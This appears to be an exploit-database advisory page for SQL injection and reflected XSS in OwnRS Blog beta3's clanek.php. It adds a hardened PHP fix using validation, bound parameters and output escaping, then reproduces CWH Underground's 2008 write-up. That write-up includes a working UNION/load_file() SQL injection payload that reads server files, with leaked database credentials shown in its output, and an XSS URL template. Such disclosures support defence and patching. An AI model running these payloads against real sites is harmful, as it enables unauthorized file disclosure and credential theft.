Vendor: OwnRS
By: CWH Underground
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: OwnRS
Affected Version From: Beta3
Affected Version To: Beta3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

OwnRS Blog beta3 (SQL/XSS) Multiple Remote Vulnerabilities

A vulnerability exists in OwnRS Blog beta3 that allows an attacker to inject arbitrary SQL via the 'id' parameter of the 'clanek.php' script. The script concatenates the user-supplied value directly into a MySQL query without sanitizing or validating it. An attacker can use this to alter the structure of the query. Successful exploitation could result in manipulated queries, information disclosure (the advisory below shows the MySQL load_file() function being used to read server-side files), and potentially unauthorized access to the application. The same unvalidated 'id' value is also echoed back into the page unescaped, giving a reflected XSS in the same script.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically construct SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.
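The following is an added example, not OwnRS code, showing how the vulnerable pattern quoted in the advisory (the 'id' value concatenated into the query and then echoed back into an anchor tag) would be written with validation, a bound parameter, and output escaping. The table and column names (clanky, id, nadpis) and the database name come from the advisory; the PDO credentials and the function names are assumptions.

```php
<?php
// Added example (not OwnRS code): hardened replacement for the clanek.php
// pattern in the advisory, which concatenated $id into SQL and echoed it
// back unescaped. PDO credentials below are placeholders (assumption).
declare(strict_types=1);

// 1. Validate: an article id is a positive integer, so reject anything else.
//    FILTER_VALIDATE_INT rejects "1'/**/UNION..." and "<script>" outright.
function parseArticleId(?string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// 2. Query with a bound parameter: the value can never change the query's shape,
//    so a UNION / load_file() payload is just a non-matching id.
function fetchArticle(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, nadpis FROM clanky WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 3. Escape on output: this is the fix for the reflected XSS at line 69,
//    where $id and the title were printed straight into the HTML.
function renderTitleLink(array $row): string
{
    $href  = 'clanek.php?id=' . (int) $row['id'];
    $title = htmlspecialchars((string) $row['nadpis'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return sprintf('<h1><a href="%s">%s</a></h1>', $href, $title);
}

// Assumed connection. Emulated prepares are disabled so the MySQL server, not
// PHP string handling, binds the parameter.
$db = new PDO('mysql:host=localhost;dbname=databaze;charset=utf8mb4', 'dbuser', 'dbpass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

$id = parseArticleId($_GET['id'] ?? null);
if ($id === null) {
    http_response_code(400);
    exit('Invalid article id');
}
$row = fetchArticle($db, $id);
if ($row === null) {
    http_response_code(404);
    exit('Article not found');
}
echo renderTitleLink($row);
```

Note that the original code also used die(mysql_error()), which leaks query structure to the client; the PDO exception mode above should be paired with a generic error page rather than printing the exception message.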

Exploit-DB raw data:

==============================================================
  OwnRS Blog beta3 (SQL/XSS) Multiple Remote Vulnerabilities
==============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 19 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : OwnRS
 VERSION     : Beta3
 VENDOR      : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/ownrs
#####################################################

--- Remote SQL Injection ---

**magic_quotes must be turned off**

------------------------------
 Vulnerable File (clanek.php)
------------------------------

@ Line 66

[+] $vysledek=mysql_query("select * from clanky where id= '" . $id . "'") or die (mysql_error());

----------
 Exploit
----------

[+] http://[Target]/[Ownrs_path]/clanek.php?id=[SQL Injection]

-------------
 POC Exploit
-------------

[+] http://localhost/own/clanek.php?id=1'/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(char(67,58,92,120,97,109,112,112,92,104,116,100,111,99,115,92,79,119,110,92,100,98,46,112,104,112)),4,5,6,7,8,9,10/**/FROM/**/autori/**/WHERE/**/id='1

When you view the source, you can see

@Line 87

[+] <h1><a href="clanek.php?id=1'/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(char(67,58,92,120,97,109,112,112,92,104,116,100,111,99,115,92,79,119,110,92,100,98,46,112,104,112)),4,5,6,7,8,9,10/**/FROM/**/autori/**/WHERE/**/id='1"><?php
[+] $spojeni= mysql_connect(
[+] //server
[+] "localhost",
[+] //login
[+] "xampp",
[+] //heslo
[+] "xampp" );
[+] //databáze
[+] mysql_select_db("databaze",$spojeni);
[+] ?>
[+] </a></h1>
[+] 45<p class="right"><strong><a href="index.php?kat=9">
[+] <div class="cara"><span class="schovat">cara</span></div>

---------------------
 Exploit Description
---------------------

    This exploit uses load_file() to view source files (load_file() can only be used with MySQL 5+)

load_file(char(67,58,92,120,97,109,112,112,92,104,116,100,111,99,115,92,79,119,110,92,100,98,46,112,104,112))
will open C:\xampp\htdocs\Own\db.php


--- Remote XSS Exploit ---

------------------------------
 Vulnerable File (clanek.php)
------------------------------

@ Line 69

[+] <h1><a href="clanek.php?id=<?echo $id?>"><?echo $zaznam["nadpis"]?></a></h1>

---------
 Exploit
---------

[+] http://[Target]/[Ownrs_path]/clanek.php?id=<XSS>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-19]